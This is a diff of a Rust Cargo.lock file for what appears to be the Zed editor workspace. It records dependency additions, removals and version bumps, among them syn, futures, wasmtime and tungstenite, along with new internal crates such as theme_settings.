@@ dependencies = [ "agent", "agent_settings", "anyhow", - "assets", "audio", - "client", "codestral", "component", "copilot", @@ -15490,8 +15840,9 @@ dependencies = [ "edit_prediction", "edit_prediction_ui", "editor", + "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "heck 0.5.0", @@ -15499,13 +15850,11 @@ dependencies = [ "language", "log", "menu", - "node_runtime", "paths", "picker", "platform_title_bar", "pretty_assertions", "project", - "recent_projects", "regex", "release_channel", "rodio", @@ -15513,18 +15862,18 @@ dependencies = [ "search", "serde", "serde_json", - "session", "settings", "shell_command_parser", "strum 0.27.2", "telemetry", "theme", + "theme_settings", "title_bar", "ui", "util", "workspace", "zed_actions", - "zlog", + "zed_credentials_provider", ] [[package]] @@ -15633,22 +15982,36 @@ name = "sidebar" version = "0.1.0" dependencies = [ "acp_thread", + "action_log", + "agent", + "agent-client-protocol", + "agent_settings", "agent_ui", + "anyhow", "chrono", "editor", "feature_flags", "fs", - "fuzzy", + "git", "gpui", - "picker", + "language_model", + "menu", + "platform_title_bar", + "pretty_assertions", "project", + "prompt_store", "recent_projects", + "remote", + "serde", + "serde_json", "settings", "theme", + "theme_settings", "ui", - "ui_input", "util", + "vim_mode_setting", "workspace", + "zed_actions", ] [[package]] @@ -15787,13 +16150,6 @@ version = "0.4.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7a2ae44ef20feb57a68b23d846850f861394c2e02dc425a50098ae8c90267589" -[[package]] -name = "slash_commands_example" -version = "0.1.0" -dependencies = [ - "zed_extension_api 0.1.0", -] - [[package]] name = "slotmap" version = "1.0.7" @@ -15820,7 +16176,7 @@ checksum = "0eb01866308440fc64d6c44d9e86c5cc17adfe33c4d6eed55da9145044d0ffc1" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15846,6 +16202,27 @@ version = "0.3.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "0f7a918bd2a9951d18ee6e48f076843e8e73a9a5d22cf05bcd4b7a81bdd04e17" +[[package]] +name = "snafu" +version = "0.8.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6e84b3f4eacbf3a1ce05eac6763b4d629d60cbc94d632e4092c54ade71f1e1a2" +dependencies = [ + "snafu-derive", +] + +[[package]] +name = "snafu-derive" +version = "0.8.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c1c97747dbf44bb1ca44a561ece23508e99cb592e862f22222dcf42f51d1e451" +dependencies = [ + "heck 0.5.0", + "proc-macro2", + "quote", + "syn 2.0.117", +] + [[package]] name = "snippet" version = "0.1.0" @@ -15862,7 +16239,7 @@ dependencies = [ "collections", "extension", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "indoc", "parking_lot", @@ -15941,9 +16318,9 @@ dependencies = [ [[package]] name = "spirv" -version = "0.3.0+sdk-1.3.268.0" +version = "0.4.0+sdk-1.4.341.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eda41003dc44290527a59b13432d4a0379379fa074b70174882adfbdfd917844" +checksum = "d9571ea910ebd84c86af4b3ed27f9dbdc6ad06f17c5f96146b2b671e2976744f" dependencies = [ "bitflags 2.10.0", ] @@ -15968,19 +16345,13 @@ dependencies = [ "der 0.7.10", ] -[[package]] -name = "sptr" -version = "0.3.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3b9b39299b249ad65f3b7e96443bad61c02ca5cd3589f46cb6d610a0fd6c0d6a" - [[package]] name = "sqlez" version = "0.1.0" dependencies = [ "anyhow", "collections", - "futures 0.3.31", + "futures 0.3.32", "indoc", "libsqlite3-sys", "log", @@ -15998,7 +16369,7 @@ version = "0.1.0" dependencies = [ "sqlez", "sqlformat", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -16075,7 +16446,7 @@ dependencies = [ "quote", "sqlx-core", "sqlx-macros-core", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -16098,7 +16469,7 @@ dependencies = [ "sqlx-mysql", "sqlx-postgres", "sqlx-sqlite", - "syn 2.0.106", + "syn 2.0.117", "tokio", "url", ] @@ -16228,9 +16599,9 @@ checksum = "6ce2be8dc25455e1f91df71bfa12ad37d7af1092ae736f3a6cd0e37bc7810596" [[package]] name = "stacker" -version = "0.1.22" +version = "0.1.23" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e1f8b29fb42aafcea4edeeb6b2f2d7ecd0d969c48b4cf0d2e64aafc471dd6e59" +checksum = "08d74a23609d509411d10e2176dc2a4346e3b4aea2e7b1869f19fdedbc71c013" dependencies = [ "cc", "cfg-if", @@ -16257,7 +16628,7 @@ checksum = "172175341049678163e979d9107ca3508046d4d2a7c6682bee46ac541b17db69" dependencies = [ "proc-macro-error2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -16299,6 +16670,7 @@ dependencies = [ "story", "strum 0.27.2", "theme", + "theme_settings", "title_bar", "ui", ] @@ -16388,7 +16760,16 @@ version = "0.27.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "af23d6f6c1a224baef9d3f61e287d2761385a5b88fdab4eb4c6f11aeb54c4bcf" dependencies = [ - "strum_macros", + "strum_macros 0.27.2", +] + +[[package]] +name = "strum" +version = "0.28.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9628de9b8791db39ceda2b119bbe13134770b56c138ec1d3af810d045c04f9bd" +dependencies = [ + "strum_macros 0.28.0", ] [[package]] @@ -16400,7 +16781,19 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", +] + +[[package]] +name = "strum_macros" +version = "0.28.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ab85eea0270ee17587ed4156089e10b9e6880ee688791d45a905f5b1ca36f664" +dependencies = [ + "heck 0.5.0", + "proc-macro2", + "quote", + "syn 2.0.117", ] [[package]] @@ -16413,9 +16806,10 @@ checksum = "13c2bddecc57b384dee18652358fb23172facb8a2c51ccc10d74c157bdea3292" name = "sum_tree" version = "0.1.0" dependencies = [ - "arrayvec", "ctor", + "heapless", "log", + "proptest", "rand 0.9.2", "rayon", "tracing", @@ -16423,49 +16817,6 @@ dependencies = [ "ztracing", ] -[[package]] -name = "supermaven" -version = "0.1.0" -dependencies = [ - "anyhow", - "client", - "collections", - "edit_prediction_types", - "editor", - "env_logger 0.11.8", - "futures 0.3.31", - "gpui", - "http_client", - "language", - "log", - "postage", - "project", - "serde", - "serde_json", - "settings", - "smol", - "supermaven_api", - "text", - "theme", - "ui", - "unicode-segmentation", - "util", -] - -[[package]] -name = "supermaven_api" -version = "0.1.0" -dependencies = [ - "anyhow", - "futures 0.3.31", - "http_client", - "paths", - "serde", - "serde_json", - "smol", - "util", -] - [[package]] name = "sval" version = "2.15.0" @@ -16744,9 +17095,9 @@ dependencies = [ [[package]] name = "syn" -version = "2.0.106" +version = "2.0.117" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ede7c438028d4436d71104916910f5bb611972c5cfd7f89b8300a8186e6fada6" +checksum = "e665b8803e7b1d2a727f4023456bbbbe74da67099c585258af0ad9c5013b9b99" dependencies = [ "proc-macro2", "quote", @@ -16785,7 +17136,16 @@ checksum = "728a70f3dbaf5bab7f0c4b1ac8d7ae5ea60a4b5549c8a5914361c99147a709d2" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", +] + +[[package]] +name = "syntax_theme" +version = "0.1.0" +dependencies = [ + "gpui", + "serde", + "serde_json", ] [[package]] @@ -16901,13 +17261,26 @@ version = "6.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a3e535eb8dded36d55ec13eddacd30dec501792ff23a0b1682c38601b8cf2349" dependencies = [ - "cfg-expr", + "cfg-expr 0.15.8", "heck 0.5.0", "pkg-config", "toml 0.8.23", "version-compare", ] +[[package]] +name = "system-deps" +version = "7.0.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "48c8f33736f986f16d69b6cb8b03f55ddcad5c41acc4ccc39dd88e84aa805e7f" +dependencies = [ + "cfg-expr 0.20.6", + "heck 0.5.0", + "pkg-config", + "toml 0.9.8", + "version-compare", +] + [[package]] name = "system-interface" version = "0.27.3" @@ -16943,13 +17316,11 @@ dependencies = [ name = "tab_switcher" version = "0.1.0" dependencies = [ - "anyhow", "collections", "ctor", "editor", "fuzzy", "gpui", - "language", "menu", "picker", "project", @@ -16959,6 +17330,7 @@ dependencies = [ "settings", "smol", "theme", + "theme_settings", "ui", "util", "workspace", @@ -17025,7 +17397,7 @@ version = "0.1.0" dependencies = [ "anyhow", "collections", - "futures 0.3.31", + "futures 0.3.32", "gpui", "hex", "log", @@ -17072,7 +17444,7 @@ dependencies = [ name = "telemetry" version = "0.1.0" dependencies = [ - "futures 0.3.31", + "futures 0.3.32", "serde", "serde_json", "telemetry_events", @@ -17097,7 +17469,7 @@ dependencies = [ "getrandom 0.3.4", "once_cell", "rustix 1.1.2", - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -17127,7 +17499,7 @@ dependencies = [ "alacritty_terminal", "anyhow", "collections", - "futures 0.3.31", + "futures 0.3.32", "gpui", "itertools 0.14.0", "libc", @@ -17138,12 +17510,12 @@ dependencies = [ "release_channel", "schemars", "serde", - "serde_json", "settings", "smol", "sysinfo 0.37.2", "task", "theme", + "theme_settings", "thiserror 2.0.17", "url", "urlencoding", @@ -17167,15 +17539,13 @@ name = "terminal_view" version = "0.1.0" dependencies = [ "anyhow", - "assistant_slash_command", "async-recursion", "breadcrumbs", - "client", "collections", "db", "dirs 4.0.0", "editor", - "futures 0.3.31", + "futures 0.3.32", "gpui", "itertools 0.14.0", "language", @@ -17183,7 +17553,6 @@ dependencies = [ "menu", "pretty_assertions", "project", - "rand 0.9.2", "regex", "schemars", "serde", @@ -17193,6 +17562,7 @@ dependencies = [ "task", "terminal", "theme", + "theme_settings", "ui", "util", "workspace", @@ -17208,7 +17578,6 @@ dependencies = [ "collections", "ctor", "gpui", - "http_client", "log", "parking_lot", "postage", @@ -17227,11 +17596,8 @@ version = "0.1.0" dependencies = [ "anyhow", "collections", - "derive_more 0.99.20", - "fs", - "futures 0.3.31", + "derive_more", "gpui", - "log", "palette", "parking_lot", "refineable", @@ -17239,10 +17605,9 @@ dependencies = [ "serde", "serde_json", "serde_json_lenient", - "settings", "strum 0.27.2", + "syntax_theme", "thiserror 2.0.17", - "util", "uuid", ] @@ -17255,6 +17620,7 @@ dependencies = [ "fs", "gpui", "theme", + "theme_settings", ] [[package]] @@ -17274,6 +17640,7 @@ dependencies = [ "simplelog", "strum 0.27.2", "theme", + "theme_settings", "vscode_theme", ] @@ -17290,10 +17657,31 @@ dependencies = [ "settings", "telemetry", "theme", - "ui", - "util", - "workspace", - "zed_actions", + "theme_settings", + "ui", + "util", + "workspace", + "zed_actions", +] + +[[package]] +name = "theme_settings" +version = "0.1.0" +dependencies = [ + "anyhow", + "collections", + "gpui", + "gpui_util", + "log", + "palette", + "refineable", + "schemars", + "serde", + "serde_json", + "serde_json_lenient", + "settings", + "theme", + "uuid", ] [[package]] @@ -17322,7 +17710,7 @@ checksum = "4fee6c4efc90059e10f81e6d42c60a18f76588c3d74cb83a0b242a2b6c7504c1" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -17333,7 +17721,7 @@ checksum = "3ff15c8ecd7de3849db632e14d18d2571fa09dfc5ed93479bc4485c7a517c913" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -17354,7 +17742,7 @@ dependencies = [ "fax", "flate2", "half", - "quick-error", + "quick-error 2.0.1", "weezl", "zune-jpeg", ] @@ -17367,7 +17755,7 @@ dependencies = [ "anyhow", "base64 0.22.1", "bstr", - "fancy-regex", + "fancy-regex 0.16.2", "lazy_static", "regex", "rustc-hash 1.1.0", @@ -17414,6 +17802,7 @@ dependencies = [ "core-foundation-sys", "sys-locale", "time", + "windows 0.61.3", ] [[package]] @@ -17453,15 +17842,14 @@ dependencies = [ [[package]] name = "tiny_http" -version = "0.8.2" +version = "0.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9ce51b50006056f590c9b7c3808c3bd70f0d1101666629713866c227d6e58d39" +checksum = "389915df6413a2e74fb181895f933386023c71110878cd0825588928e64cdc82" dependencies = [ "ascii", - "chrono", "chunked_transfer", + "httpdate", "log", - "url", ] [[package]] @@ -17510,19 +17898,18 @@ dependencies = [ "chrono", "client", "cloud_api_types", - "collections", "db", - "feature_flags", "git_ui", "gpui", - "http_client", + "icons", + "livekit_client", "notifications", "platform_title_bar", - "pretty_assertions", "project", "recent_projects", "release_channel", "remote", + "remote_connection", "rpc", "schemars", "semver", @@ -17532,7 +17919,6 @@ dependencies = [ "story", "telemetry", "theme", - "tree-sitter-md", "ui", "util", "windows 0.61.3", @@ -17576,7 +17962,7 @@ checksum = "af407857209536a95c8e56f8231ef2c2e2aff839b22e07a1ffcbc617e9db9fa5" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -17659,17 +18045,18 @@ dependencies = [ [[package]] name = "tokio-tungstenite" -version = "0.26.2" +version = "0.28.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7a9daff607c6d2bf6c16fd681ccb7eecc83e4e2cdc1ca067ffaadfca5de7f084" +checksum = "d25a406cddcc431a75d3d9afc6a7c0f7428d4891dd973e4d54c56b46127bf857" dependencies = [ "futures-util", "log", "rustls 0.23.33", + "rustls-native-certs 0.8.2", "rustls-pki-types", "tokio", "tokio-rustls 0.26.2", - "tungstenite 0.26.2", + "tungstenite 0.28.0", ] [[package]] @@ -17794,7 +18181,7 @@ dependencies = [ "anyhow", "convert_case 0.8.0", "editor", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "language", @@ -17840,8 +18227,10 @@ dependencies = [ "pin-project-lite", "sync_wrapper 1.0.2", "tokio", + "tokio-util", "tower-layer", "tower-service", + "tracing", ] [[package]] @@ -17879,6 +18268,7 @@ dependencies = [ "tower 0.5.2", "tower-layer", "tower-service", + "tracing", ] [[package]] @@ -17913,7 +18303,7 @@ checksum = "7490cfa5ec963746568740651ac6781f701c9c5ea257c58e057f3ba8cf69e8da" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -17997,18 +18387,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2fb391ac70462b3097a755618fbf9c8f95ecc1eb379a414f7b46f202ed10db1f" dependencies = [ "cc", - "windows-targets 0.48.5", -] - -[[package]] -name = "trait-variant" -version = "0.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "70977707304198400eb4835a78f6a9f928bf41bba420deb8fdb175cd965d77a7" -dependencies = [ - "proc-macro2", - "quote", - "syn 2.0.106", + "windows-targets 0.52.6", ] [[package]] @@ -18023,9 +18402,9 @@ dependencies = [ [[package]] name = "tree-sitter" -version = "0.26.3" +version = "0.26.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "974d205cc395652cfa8b37daa053fe56eebd429acf8dc055503fee648dae981e" +checksum = "887bd495d0582c5e3e0d8ece2233666169fa56a9644d172fc22ad179ab2d0538" dependencies = [ "cc", "regex", @@ -18228,9 +18607,9 @@ dependencies = [ [[package]] name = "tree-sitter-rust" -version = "0.24.0" +version = "0.24.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4b9b18034c684a2420722be8b2a91c9c44f2546b631c039edf575ccba8c61be1" +checksum = "439e577dbe07423ec2582ac62c7531120dbfccfa6e5f92406f93dd271a120e45" dependencies = [ "cc", "tree-sitter-language", @@ -18325,9 +18704,9 @@ dependencies = [ [[package]] name = "tungstenite" -version = "0.26.2" +version = "0.27.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4793cb5e56680ecbb1d843515b23b6de9a75eb04b66643e256a396d43be33c13" +checksum = "eadc29d668c91fcc564941132e17b28a7ceb2f3ebf0b9dae3e03fd7a6748eb0d" dependencies = [ "bytes 1.11.1", "data-encoding", @@ -18344,9 +18723,9 @@ dependencies = [ [[package]] name = "tungstenite" -version = "0.27.0" +version = "0.28.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eadc29d668c91fcc564941132e17b28a7ceb2f3ebf0b9dae3e03fd7a6748eb0d" +checksum = "8628dcc84e5a09eb3d8423d6cb682965dea9133204e8fb3efee74c2a0c259442" dependencies = [ "bytes 1.11.1", "data-encoding", @@ -18361,12 +18740,6 @@ dependencies = [ "utf-8", ] -[[package]] -name = "typed-path" -version = "0.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c462d18470a2857aa657d338af5fa67170bb48bcc80a296710ce3b0802a32566" - [[package]] name = "typeid" version = "1.0.3" @@ -18435,18 +18808,17 @@ dependencies = [ "documented", "gpui", "gpui_macros", + "gpui_util", "icons", "itertools 0.14.0", "menu", "schemars", "serde", - "settings", "smallvec", "story", "strum 0.27.2", "theme", "ui_macros", - "util", "windows 0.61.3", ] @@ -18465,7 +18837,7 @@ version = "0.1.0" dependencies = [ "component", "quote", - "syn 2.0.106", + "syn 2.0.117", "ui", ] @@ -18477,11 +18849,17 @@ dependencies = [ "markdown", "menu", "settings", - "theme", + "theme_settings", "ui", "workspace", ] +[[package]] +name = "unarray" +version = "0.1.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "eaea85b334db583fe3274d12b4cd1880032beab409c0d774be044d4480ab9a94" + [[package]] name = "unicase" version = "2.8.1" @@ -18682,12 +19060,11 @@ dependencies = [ "command-fds", "dirs 4.0.0", "dunce", - "futures 0.3.31", + "futures 0.3.32", "futures-lite 1.13.0", "git2", "globset", "gpui_util", - "indoc", "itertools 0.14.0", "libc", "log", @@ -18720,7 +19097,7 @@ version = "0.1.0" dependencies = [ "perf", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -18832,7 +19209,6 @@ name = "vim" version = "0.1.0" dependencies = [ "anyhow", - "assets", "async-compat", "async-trait", "collections", @@ -18841,7 +19217,7 @@ dependencies = [ "db", "editor", "env_logger 0.11.8", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "git_ui", "gpui", @@ -18872,7 +19248,7 @@ dependencies = [ "task", "text", "theme", - "title_bar", + "theme_settings", "tokio", "ui", "util", @@ -18886,6 +19262,7 @@ dependencies = [ name = "vim_mode_setting" version = "0.1.0" dependencies = [ + "gpui", "settings", ] @@ -18938,6 +19315,15 @@ dependencies = [ "serde", ] +[[package]] +name = "wait-timeout" +version = "0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "09ac3b126d3914f9849036f826e054cbabdc8519970b8998ddaf3b5bd3c65f11" +dependencies = [ + "libc", +] + [[package]] name = "waker-fn" version = "1.2.0" @@ -19023,9 +19409,9 @@ checksum = "b8dad83b4f25e74f184f64c43b150b91efe7647395b42289f38e50566d82855b" [[package]] name = "wasm-bindgen" -version = "0.2.104" +version = "0.2.113" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c1da10c01ae9f1ae40cbfac0bac3b1e724b320abfcf52229f80b547c0d250e2d" +checksum = "60722a937f594b7fde9adb894d7c092fc1bb6612897c46368d18e7a20208eff2" dependencies = [ "cfg-if", "once_cell", @@ -19034,27 +19420,14 @@ dependencies = [ "wasm-bindgen-shared", ] -[[package]] -name = "wasm-bindgen-backend" -version = "0.2.104" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "671c9a5a66f49d8a47345ab942e2cb93c7d1d0339065d4f8139c486121b43b19" -dependencies = [ - "bumpalo", - "log", - "proc-macro2", - "quote", - "syn 2.0.106", - "wasm-bindgen-shared", -] - [[package]] name = "wasm-bindgen-futures" -version = "0.4.54" +version = "0.4.63" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7e038d41e478cc73bae0ff9b36c60cff1c98b8f38f8d7e8061e79ee63608ac5c" +checksum = "8a89f4650b770e4521aa6573724e2aed4704372151bd0de9d16a3bbabb87441a" dependencies = [ "cfg-if", + "futures-util", "js-sys", "once_cell", "wasm-bindgen", @@ -19063,9 +19436,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-macro" -version = "0.2.104" +version = "0.2.113" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7ca60477e4c59f5f2986c50191cd972e3a50d8a95603bc9434501cf156a9a119" +checksum = "0fac8c6395094b6b91c4af293f4c79371c163f9a6f56184d2c9a85f5a95f3950" dependencies = [ "quote", "wasm-bindgen-macro-support", @@ -19073,22 +19446,22 @@ dependencies = [ [[package]] name = "wasm-bindgen-macro-support" -version = "0.2.104" +version = "0.2.113" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9f07d2f20d4da7b26400c9f4a0511e6e0345b040694e8a75bd41d578fa4421d7" +checksum = "ab3fabce6159dc20728033842636887e4877688ae94382766e00b180abac9d60" dependencies = [ + "bumpalo", "proc-macro2", "quote", - "syn 2.0.106", - "wasm-bindgen-backend", + "syn 2.0.117", "wasm-bindgen-shared", ] [[package]] name = "wasm-bindgen-shared" -version = "0.2.104" +version = "0.2.113" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bad67dc8b2a1a6e5448428adec4c3e84c43e561d8c9ee8a9e5aabeb193ec41d1" +checksum = "de0e091bdb824da87dc01d967388880d017a0a9bc4f3bdc0d86ee9f9336e3bb5" dependencies = [ "unicode-ident", ] @@ -19124,12 +19497,12 @@ dependencies = [ [[package]] name = "wasm-encoder" -version = "0.229.0" +version = "0.236.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "38ba1d491ecacb085a2552025c10a675a6fddcbd03b1fc9b36c536010ce265d2" +checksum = "724fccfd4f3c24b7e589d333fc0429c68042897a7e8a5f8694f31792471841e7" dependencies = [ "leb128fmt", - "wasmparser 0.229.0", + "wasmparser 0.236.1", ] [[package]] @@ -19208,7 +19581,7 @@ version = "0.3.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b7516db7f32decdadb1c3b8deb1b7d78b9df7606c5cc2f6241737c2ab3a0258e" dependencies = [ - "futures 0.3.31", + "futures 0.3.32", "js-sys", "wasm-bindgen", "web-sys", @@ -19252,9 +19625,9 @@ dependencies = [ [[package]] name = "wasmparser" -version = "0.229.0" +version = "0.236.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0cc3b1f053f5d41aa55640a1fa9b6d1b8a9e4418d118ce308d20e24ff3575a8c" +checksum = "a9b1e81f3eb254cf7404a82cee6926a4a3ccc5aad80cc3d43608a070c67aa1d7" dependencies = [ "bitflags 2.10.0", "hashbrown 0.15.5", @@ -19277,22 +19650,22 @@ dependencies = [ [[package]] name = "wasmprinter" -version = "0.229.0" +version = "0.236.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d25dac01892684a99b8fbfaf670eb6b56edea8a096438c75392daeb83156ae2e" +checksum = "2df225df06a6df15b46e3f73ca066ff92c2e023670969f7d50ce7d5e695abbb1" dependencies = [ "anyhow", "termcolor", - "wasmparser 0.229.0", + "wasmparser 0.236.1", ] [[package]] name = "wasmtime" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "57373e1d8699662fb791270ac5dfac9da5c14f618ecf940cdb29dc3ad9472a3c" +checksum = "6a2f8736ddc86e03a9d0e4c477a37939cfc53cd1b052ee38a3133679b87ef830" dependencies = [ - "addr2line 0.24.2", + "addr2line", "anyhow", "async-trait", "bitflags 2.10.0", @@ -19306,10 +19679,9 @@ dependencies = [ "log", "mach2 0.4.3", "memfd", - "object 0.36.7", + "object", "once_cell", "postcard", - "psm", "pulley-interpreter", "rayon", "rustix 1.1.2", @@ -19317,82 +19689,109 @@ dependencies = [ "serde", "serde_derive", "smallvec", - "sptr", "target-lexicon 0.13.3", - "trait-variant", - "wasmparser 0.229.0", - "wasmtime-asm-macros", - "wasmtime-component-macro", - "wasmtime-component-util", - "wasmtime-cranelift", + "wasmparser 0.236.1", "wasmtime-environ", - "wasmtime-fiber", - "wasmtime-jit-icache-coherence", - "wasmtime-math", - "wasmtime-slab", - "wasmtime-versioned-export-macros", - "wasmtime-winch", - "windows-sys 0.59.0", + "wasmtime-internal-asm-macros", + "wasmtime-internal-component-macro", + "wasmtime-internal-component-util", + "wasmtime-internal-cranelift", + "wasmtime-internal-fiber", + "wasmtime-internal-jit-debug", + "wasmtime-internal-jit-icache-coherence", + "wasmtime-internal-math", + "wasmtime-internal-slab", + "wasmtime-internal-unwinder", + "wasmtime-internal-versioned-export-macros", + "wasmtime-internal-winch", + "windows-sys 0.60.2", ] [[package]] -name = "wasmtime-asm-macros" -version = "33.0.2" +name = "wasmtime-c-api-impl" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bd0fc91372865167a695dc98d0d6771799a388a7541d3f34e939d0539d6583de" +checksum = "f3c62ea3fa30e6b0cf61116b3035121b8f515c60ac118ebfdab2ee56d028ed1e" dependencies = [ - "cfg-if", + "anyhow", + "log", + "tracing", + "wasmtime", + "wasmtime-internal-c-api-macros", ] [[package]] -name = "wasmtime-c-api-impl" -version = "33.0.2" +name = "wasmtime-environ" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "46db556f1dccdd88e0672bd407162ab0036b72e5eccb0f4398d8251cba32dba1" +checksum = "733682a327755c77153ac7455b1ba8f2db4d9946c1738f8002fe1fbda1d52e83" dependencies = [ "anyhow", + "cpp_demangle", + "cranelift-bitset", + "cranelift-entity", + "gimli", + "indexmap", "log", - "tracing", - "wasmtime", - "wasmtime-c-api-macros", + "object", + "postcard", + "rustc-demangle", + "semver", + "serde", + "serde_derive", + "smallvec", + "target-lexicon 0.13.3", + "wasm-encoder 0.236.1", + "wasmparser 0.236.1", + "wasmprinter", + "wasmtime-internal-component-util", +] + +[[package]] +name = "wasmtime-internal-asm-macros" +version = "36.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "68288980a2e02bcb368d436da32565897033ea21918007e3f2bae18843326cf9" +dependencies = [ + "cfg-if", ] [[package]] -name = "wasmtime-c-api-macros" -version = "33.0.2" +name = "wasmtime-internal-c-api-macros" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "315cc6bc8cdc66f296accb26d7625ae64c1c7b6da6f189e8a72ce6594bf7bd36" +checksum = "3c8c61294155a6d23c202f08cf7a2f9392a866edd50517508208818be626ce9f" dependencies = [ "proc-macro2", "quote", ] [[package]] -name = "wasmtime-component-macro" -version = "33.0.2" +name = "wasmtime-internal-component-macro" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "25c9c7526675ff9a9794b115023c4af5128e3eb21389bfc3dc1fd344d549258f" +checksum = "5dea846da68f8e776c8a43bde3386022d7bb74e713b9654f7c0196e5ff2e4684" dependencies = [ "anyhow", "proc-macro2", "quote", - "syn 2.0.106", - "wasmtime-component-util", - "wasmtime-wit-bindgen", - "wit-parser 0.229.0", + "syn 2.0.117", + "wasmtime-internal-component-util", + "wasmtime-internal-wit-bindgen", + "wit-parser 0.236.1", ] [[package]] -name = "wasmtime-component-util" -version = "33.0.2" +name = "wasmtime-internal-component-util" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cc42ec8b078875804908d797cb4950fec781d9add9684c9026487fd8eb3f6291" +checksum = "fe1e5735b3c8251510d2a55311562772d6c6fca9438a3d0329eb6e38af4957d6" [[package]] -name = "wasmtime-cranelift" -version = "33.0.2" +name = "wasmtime-internal-cranelift" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b2bd72f0a6a0ffcc6a184ec86ac35c174e48ea0e97bbae277c8f15f8bf77a566" +checksum = "e89bb9ef571288e2be6b8a3c4763acc56c348dcd517500b1679d3ffad9e4a757" dependencies = [ "anyhow", "cfg-if", @@ -19401,104 +19800,132 @@ dependencies = [ "cranelift-entity", "cranelift-frontend", "cranelift-native", - "gimli 0.31.1", + "gimli", "itertools 0.14.0", "log", - "object 0.36.7", + "object", "pulley-interpreter", "smallvec", "target-lexicon 0.13.3", "thiserror 2.0.17", - "wasmparser 0.229.0", + "wasmparser 0.236.1", "wasmtime-environ", - "wasmtime-versioned-export-macros", + "wasmtime-internal-math", + "wasmtime-internal-versioned-export-macros", ] [[package]] -name = "wasmtime-environ" -version = "33.0.2" +name = "wasmtime-internal-fiber" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6187bb108a23eb25d2a92aa65d6c89fb5ed53433a319038a2558567f3011ff2" +checksum = "b698d004b15ea1f1ae2d06e5e8b80080cbd684fd245220ce2fac3cdd5ecf87f2" dependencies = [ "anyhow", - "cpp_demangle", - "cranelift-bitset", - "cranelift-entity", - "gimli 0.31.1", - "indexmap", - "log", - "object 0.36.7", - "postcard", - "rustc-demangle", - "semver", - "serde", - "serde_derive", - "smallvec", - "target-lexicon 0.13.3", - "wasm-encoder 0.229.0", - "wasmparser 0.229.0", - "wasmprinter", - "wasmtime-component-util", + "cc", + "cfg-if", + "libc", + "rustix 1.1.2", + "wasmtime-internal-asm-macros", + "wasmtime-internal-versioned-export-macros", + "windows-sys 0.60.2", ] [[package]] -name = "wasmtime-fiber" -version = "33.0.2" +name = "wasmtime-internal-jit-debug" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dc8965d2128c012329f390e24b8b2758dd93d01bf67e1a1a0dd3d8fd72f56873" +checksum = 